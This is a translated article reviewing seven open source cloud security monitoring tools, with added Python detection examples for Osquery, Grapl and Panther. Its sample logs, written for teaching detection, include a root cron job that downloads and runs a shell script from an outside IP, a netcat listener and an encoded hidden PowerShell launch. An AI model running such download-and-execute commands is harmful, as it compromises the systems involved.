The spread of cloud computing helps companies grow their business. Using a new platform, however, also means facing new threats. Standing up a team inside the organization to monitor the security of cloud services is not a simple task: the existing monitoring tools are expensive and time-consuming, and when a large cloud infrastructure has to be secured they become hard to manage. Companies that want to keep their cloud security at a high level need tools that are more powerful, more flexible and easier to understand than what has been available so far. This is where open source technologies are a great help: they save on the security budget, and they are built by specialists who know the business.
This article, whose translation we are publishing today, gives an overview of 7 open source tools for monitoring the security of cloud systems. These tools are designed to protect against hackers and cybercriminals by detecting anomalies and dangerous activity.
1. Osquery
The Osquery framework was created by Facebook. After the company realized it was not the only one that needed a tool for monitoring the low-level mechanisms of an operating system, the code was published in 2014. Since then, Osquery has been used by specialists at companies such as Dactiv, Google, Kolide, Trail of Bits and Uptycs, and that remains the case today.
Osquery's host monitoring daemon, osqueryd, lets you schedule queries that collect data from across the organization's entire infrastructure. The daemon gathers the query results and writes logs that reflect changes in the state of the infrastructure (by default a scheduled query is differential: each run logs only the rows that were added or removed since the previous run). This helps security specialists keep track of what is going on inside their systems, and it is especially useful for anomaly detection. Osquery's log aggregation capabilities make it easier not only to hunt for known and unknown malware, but also to determine where an intruder got into the system and to find the programs the intruder installed.
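As an added example (not code from the original article or from the osquery project), here is how a practitioner could turn osqueryd's differential result log into alerts. The scheduled queries and the sample log lines are constructed for this illustration; the expected-listener table and the trusted path prefixes are assumptions that a real deployment would replace with its own baseline.

```python
import json

# Scheduled queries as they would be written in osquery.conf. The config itself is
# constructed for this example; the tables (listening_ports, processes, crontab) and the
# "schedule" layout are standard osquery.
OSQUERY_CONF = {
    "options": {"logger_plugin": "filesystem", "schedule_splay_percent": 10},
    "schedule": {
        "listening_ports": {
            "query": (
                "SELECT p.pid, p.port, p.protocol, p.address, pr.path "
                "FROM listening_ports p JOIN processes pr USING (pid) "
                "WHERE p.port != 0;"
            ),
            "interval": 60,
        },
        "crontab": {"query": "SELECT command, path FROM crontab;", "interval": 300},
    },
}

# Constructed sample of osqueryd.results.log in differential mode: one JSON object per
# line, and "action" says whether the row appeared ("added") or disappeared ("removed")
# relative to the previous run of the same scheduled query.
SAMPLE_RESULTS_LOG = """\
{"name":"listening_ports","hostIdentifier":"web-01","unixTime":1700000000,"action":"added","columns":{"pid":"812","port":"443","protocol":"6","address":"0.0.0.0","path":"/usr/sbin/nginx"}}
{"name":"listening_ports","hostIdentifier":"web-01","unixTime":1700000060,"action":"added","columns":{"pid":"4021","port":"4444","protocol":"6","address":"0.0.0.0","path":"/tmp/.x/nc"}}
{"name":"crontab","hostIdentifier":"web-01","unixTime":1700000120,"action":"added","columns":{"command":"curl -s http://198.51.100.7/a.sh | sh","path":"/var/spool/cron/crontabs/root"}}
{"name":"listening_ports","hostIdentifier":"web-01","unixTime":1700000180,"action":"removed","columns":{"pid":"4021","port":"4444","protocol":"6","address":"0.0.0.0","path":"/tmp/.x/nc"}}
"""

# Assumed baseline: (port, binary path) pairs allowed to listen on this fleet, and the
# directories where legitimately installed daemons live. A real deployment derives these
# from its own inventory.
EXPECTED_LISTENERS = {("443", "/usr/sbin/nginx"), ("22", "/usr/sbin/sshd")}
TRUSTED_BIN_PREFIXES = ("/usr/sbin/", "/usr/bin/", "/usr/lib/", "/usr/libexec/")
DOWNLOAD_EXEC_MARKERS = ("curl ", "wget ", "| sh", "| bash")


def parse_results_log(text):
    """Yield differential result records, skipping blank or partially written lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # osqueryd may be mid-write when the file is read; ignore the torn line
        if rec.get("action") in ("added", "removed") and isinstance(rec.get("columns"), dict):
            yield rec


def detect_anomalies(records):
    """Return (host, rule, detail) tuples for state changes that deserve a look."""
    alerts = []
    for rec in records:
        if rec["action"] != "added":
            continue  # a row disappearing is rarely the signal; a new row is
        host = rec.get("hostIdentifier", "unknown")
        cols = rec["columns"]
        if rec["name"] == "listening_ports":
            if (cols["port"], cols["path"]) in EXPECTED_LISTENERS:
                continue
            trusted = cols["path"].startswith(TRUSTED_BIN_PREFIXES)
            rule = "unexpected_listener" if trusted else "untrusted_listener"
            alerts.append((host, rule,
                           f"{cols['path']} (pid {cols['pid']}) listening on {cols['address']}:{cols['port']}"))
        elif rec["name"] == "crontab":
            if any(marker in cols["command"] for marker in DOWNLOAD_EXEC_MARKERS):
                alerts.append((host, "download_and_exec_cron", f"{cols['path']}: {cols['command']}"))
    return alerts


def run_example():
    return detect_anomalies(parse_results_log(SAMPLE_RESULTS_LOG))


if __name__ == "__main__":
    for host, rule, detail in run_example():
        print(f"[{host}] {rule}: {detail}")
```

On the sample log the nginx listener matches the baseline and is ignored, the netcat listener in /tmp and the cron job that pipes a download into a shell each produce one alert, and the "removed" row is skipped. The same loop works unchanged on a real osqueryd.results.log because the record shape is what osqueryd's filesystem logger writes.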
2. GoAudit
GoAudit is written in Golang, a type-safe, high-performance language. It is an alternative to auditd, the userspace daemon of the Linux audit subsystem: it receives the kernel's audit messages over the audit netlink socket and writes them out as JSON. Before installing GoAudit, make sure your Golang version is 1.7 or later.
3. Grapl
Grapl takes security-related logs (Sysmon logs or plain JSON logs) and converts them into subgraphs, defining an "identity" for each node. It then merges the subgraphs into a common graph (the master graph) that represents the actions performed in the analyzed environment. Next, Grapl runs analyzers over the resulting graph using "attacker signatures" to detect anomalies and suspicious patterns. When an analyzer detects a suspicious subgraph, Grapl generates an Engagement structure for investigation. An Engagement is a Python class that can be loaded, for example, into a Jupyter Notebook deployed in the AWS environment. By expanding the graph, Grapl lets you scale up information gathering for an incident investigation.
If you want to get more out of Grapl, see the following link.
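As an added example that is not Grapl's own code, here is the subgraph-then-master-graph idea in miniature: each Sysmon-style event becomes a small subgraph, the subgraphs are merged on the process identity (Sysmon's ProcessGuid), and one analyzer encodes one attacker signature, an Office application spawning a shell that then opens a network connection. The events and GUIDs are constructed; the field names follow Sysmon Event ID 1 and 3, but the event list itself is invented for this illustration.

```python
from collections import defaultdict

# Constructed Sysmon-style events (a subset of the fields of Event ID 1 "Process Create" and
# Event ID 3 "Network connection"), in the order a log shipper might deliver them. Note that
# the network event for the PowerShell process arrives before its process-create event.
SAMPLE_EVENTS = [
    {"EventID": 3, "Computer": "WS-17", "ProcessGuid": "{P3}",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    {"EventID": 1, "Computer": "WS-17", "ProcessGuid": "{P2}", "ParentProcessGuid": "{P1}",
     "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "WINWORD.EXE /n invoice.docm"},
    {"EventID": 1, "Computer": "WS-17", "ProcessGuid": "{P3}", "ParentProcessGuid": "{P2}",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand SQBFAFgA"},
    {"EventID": 3, "Computer": "WS-17", "ProcessGuid": "{P4}",
     "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "DestinationIp": "93.184.216.34", "DestinationPort": 443},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def event_to_subgraph(ev):
    """One event -> (nodes, edges). Processes are identified by ProcessGuid, so the same
    process seen in several events resolves to one node when the subgraphs are merged."""
    nodes, edges = {}, []
    host, proc = ev["Computer"], ev["ProcessGuid"]
    nodes[proc] = {"type": "process", "host": host, "image": ev["Image"], "cmdline": ev.get("CommandLine")}
    if ev["EventID"] == 1:
        parent = ev["ParentProcessGuid"]
        nodes[parent] = {"type": "process", "host": host, "image": ev["ParentImage"], "cmdline": None}
        edges.append((parent, proc, "spawned"))
    elif ev["EventID"] == 3:
        remote = f"{ev['DestinationIp']}:{ev['DestinationPort']}"
        nodes[remote] = {"type": "remote", "host": host, "image": None, "cmdline": None}
        edges.append((proc, remote, "connected_to"))
    return nodes, edges


def merge_subgraphs(subgraphs):
    """Union of all subgraphs; attributes unknown to an earlier subgraph are filled in later."""
    nodes, edges = {}, set()
    for sub_nodes, sub_edges in subgraphs:
        for nid, attrs in sub_nodes.items():
            known = nodes.setdefault(nid, {})
            for key, value in attrs.items():
                if known.get(key) is None:
                    known[key] = value
        edges.update(sub_edges)
    return nodes, edges


def analyzer_office_to_shell_with_network(nodes, edges):
    """Attacker signature: an Office process has a descendant shell that connected out."""
    out = defaultdict(list)
    for src, dst, label in edges:
        out[(src, label)].append(dst)
    hits = []
    for nid, node in nodes.items():
        if node["type"] != "process" or basename(node["image"]) not in OFFICE_APPS:
            continue
        stack = [(nid, [nid])]  # depth-first over "spawned" edges, carrying the lineage so far
        while stack:
            cur, lineage = stack.pop()
            for child in out[(cur, "spawned")]:
                child_lineage = lineage + [child]
                remotes = sorted(out[(child, "connected_to")])
                if basename(nodes[child]["image"]) in SHELLS and remotes:
                    hits.append({"host": node["host"],
                                 "lineage": [nodes[p]["image"] for p in child_lineage],
                                 "cmdline": nodes[child]["cmdline"],
                                 "remotes": remotes})
                stack.append((child, child_lineage))
    return hits


def run_example():
    nodes, edges = merge_subgraphs(event_to_subgraph(ev) for ev in SAMPLE_EVENTS)
    return analyzer_office_to_shell_with_network(nodes, edges)
```

Because merging is keyed on ProcessGuid, the out-of-order network event still attaches to the right process, and the command line learned later fills in the attribute the earlier subgraph lacked. The Chrome connection produces no hit since no Office ancestor exists; the WINWORD to powershell lineage with its outbound connection is the one result, which is the kind of subgraph Grapl would hand to an Engagement.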
4. OSSEC
OSSEC combines a host-based intrusion detection system (HIDS) with security incident management (SIM) and security information and event management (SIEM). OSSEC can monitor file integrity in real time; it can also, for example, monitor the Windows registry and detect rootkits. It can notify the people concerned about detected problems in real time, which helps them respond quickly to detected threats. The platform supports Microsoft Windows and modern Unix-like systems such as Linux, FreeBSD, OpenBSD and Solaris.
The OSSEC platform consists of a central control entity, the manager, which receives information from agents (small programs installed on the monitored systems) and uses it for monitoring. The manager is installed on a Linux system; it holds the database used for file integrity checking and keeps the logs and records of events and system audit results.
The OSSEC project is currently supported by Atomicorp. The company maintains the free open source version.
5. Suricata
Suricata was released in 2009. It works on rules: the user describes specific characteristics of network traffic, and when a rule is triggered Suricata generates an alert and, depending on how the rule is configured, blocks or drops the suspicious connection (blocking requires Suricata to run inline in IPS mode; in passive IDS mode it only alerts). The project supports multithreading, which allows a large number of rules to be processed quickly on networks carrying heavy traffic. Thanks to multithreading, an ordinary server can successfully analyze traffic at 10 Gb/s, and the administrator does not have to limit the rule set used for traffic analysis. Suricata also supports file hashing and file extraction.
Using features recently added to the product, Suricata can be configured to run on a regular server or on a virtual machine, for example in AWS.
The project supports Lua scripting, which can be used to build complex, detailed threat signature analysis logic.
The Suricata project is maintained by the Open Information Security Foundation (OISF).
6. Zeek
Like Suricata, Zeek can be thought of as a network security tool that gives specialists the ability to investigate incidents by learning what happened before or during the incident. In addition, Zeek converts network traffic data into high-level events and makes them available to a script interpreter. The interpreter supports a programming language that is used to interact with these events and to work out exactly what they mean from a network security standpoint. The Zeek programming language lets you customize the interpretation of metadata to the needs of a specific organization, and complex logical conditions can be built with the AND, OR and NOT operators. This lets users tailor how their environment is analyzed. Note, however, that compared with Suricata, Zeek can look like a rather complex tool when it comes to gathering intelligence on security threats.
If you want to learn more about Zeek, get in touch with us.
7. Panther
Panther's main functions are:
- Detecting unauthorized access to resources through log analysis.
- Threat scanning, implemented by searching logs for indicators of security problems. Searches run over Panther's standardized data fields.
- Checking systems for SOC/PCI/HIPAA compliance using Panther's built-in mechanisms.
- Protecting cloud resources by automatically remediating misconfigurations that could cause serious problems if exploited.
Panther is deployed into the organization's AWS cloud with AWS CloudFormation, which keeps users in control of their own data at all times.
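Panther detections are Python: a module exports rule(event), which returns True when the event should alert, plus optional functions such as title(event), severity(event) and alert_context(event). The rule below is an added example written for this article, not one of Panther's packaged rules; it flags direct use of the AWS root account in CloudTrail, the kind of unauthorized-access detection the first item in the list describes. The CloudTrail records are constructed, and the small run_rule harness stands in for Panther's own engine, which passes an event object that supports .get() rather than a plain dict.

```python
# Constructed CloudTrail records, trimmed to the fields the rule uses.
SAMPLE_EVENTS = [
    {   # root console login without MFA -> alert, CRITICAL
        "eventVersion": "1.08",
        "userIdentity": {"type": "Root", "arn": "arn:aws:iam::123456789012:root", "accountId": "123456789012"},
        "eventType": "AwsConsoleSignIn", "eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin",
        "sourceIPAddress": "203.0.113.5",
        "additionalEventData": {"MFAUsed": "No"},
        "responseElements": {"ConsoleLogin": "Success"},
    },
    {   # root API call -> alert, HIGH
        "userIdentity": {"type": "Root", "arn": "arn:aws:iam::123456789012:root", "accountId": "123456789012"},
        "eventType": "AwsApiCall", "eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
        "sourceIPAddress": "203.0.113.5",
    },
    {   # an IAM user, not root -> no alert
        "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice", "accountId": "123456789012"},
        "eventType": "AwsApiCall", "eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
        "sourceIPAddress": "203.0.113.9",
    },
    {   # root identity used on the account's behalf by an AWS service -> no alert
        "userIdentity": {"type": "Root", "arn": "arn:aws:iam::123456789012:root", "accountId": "123456789012",
                         "invokedBy": "cloudtrail.amazonaws.com"},
        "eventType": "AwsServiceEvent", "eventSource": "cloudtrail.amazonaws.com", "eventName": "StartLogging",
        "sourceIPAddress": "cloudtrail.amazonaws.com",
    },
]


def _is_root(event):
    identity = event.get("userIdentity") or {}
    return identity.get("type") == "Root" and identity.get("invokedBy") is None


def rule(event):
    """Alert on any direct use of the AWS root account. Service-generated events and
    actions taken on the account's behalf (userIdentity.invokedBy set) are excluded."""
    if event.get("eventType") == "AwsServiceEvent":
        return False
    return _is_root(event)


def _console_login_without_mfa(event):
    extra = event.get("additionalEventData") or {}
    return event.get("eventName") == "ConsoleLogin" and extra.get("MFAUsed") != "Yes"


def severity(event):
    """Dynamic severity: an interactive root login without MFA is the worst case."""
    return "CRITICAL" if _console_login_without_mfa(event) else "HIGH"


def title(event):
    account = (event.get("userIdentity") or {}).get("accountId", "unknown")
    return (f"AWS root account used in {account}: "
            f"{event.get('eventName')} from {event.get('sourceIPAddress')}")


def alert_context(event):
    """Extra fields attached to the alert so the responder does not have to re-query."""
    return {
        "eventName": event.get("eventName"),
        "sourceIPAddress": event.get("sourceIPAddress"),
        "mfaUsed": (event.get("additionalEventData") or {}).get("MFAUsed"),
    }


def run_rule(events):
    """Stand-in for Panther's engine: evaluate every event and collect the alerts."""
    return [(severity(ev), title(ev)) for ev in events if rule(ev)]
```

The invokedBy and AwsServiceEvent exclusions are what keep this rule quiet in normal operation: AWS services acting on the account's behalf carry the root identity but are not a person using root credentials. Over the sample records the console login and the CreateAccessKey call alert, the IAM user and the service event do not.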
Conclusion
In recent years, monitoring system security has become one of the most important tasks. Open source tools help companies of any size solve this problem: they cost nothing or almost nothing and offer many possibilities.
Dear readers, what security monitoring tools do you use?
Source: habr.com